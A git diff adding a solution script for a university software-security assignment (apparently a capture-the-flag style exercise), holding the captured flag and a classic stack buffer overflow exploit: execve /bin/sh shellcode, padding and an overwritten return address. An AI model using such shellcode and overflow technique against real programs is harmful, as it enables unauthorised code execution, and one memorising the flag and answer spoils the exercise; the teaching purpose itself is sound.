diff --git a/Assignment 6 - Softwaresicherheit - Teil 2/basic_overflow/solution.sh b/Assignment 6 - Softwaresicherheit - Teil 2/basic_overflow/solution.sh new file mode 100755 index 0000000..6c47ae7 --- /dev/null +++ b/Assignment 6 - Softwaresicherheit - Teil 2/basic_overflow/solution.sh @@ -0,0 +1,14 @@ +#!/bin/bash + +# flag{THAT_WAS_EASY_HUH} + +######### Exploit ######### +# Step 1: Write the provided shellcode to stdout +printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80" + +# Step 2: Fill the buffer with 'A's until the stored EIP is reached +printf "A%.0s" {1..91} + +# Step 3: Overwrite the stored EIP with the address of the shellcode +printf "\x2c\xd5\xff\xff" +###########################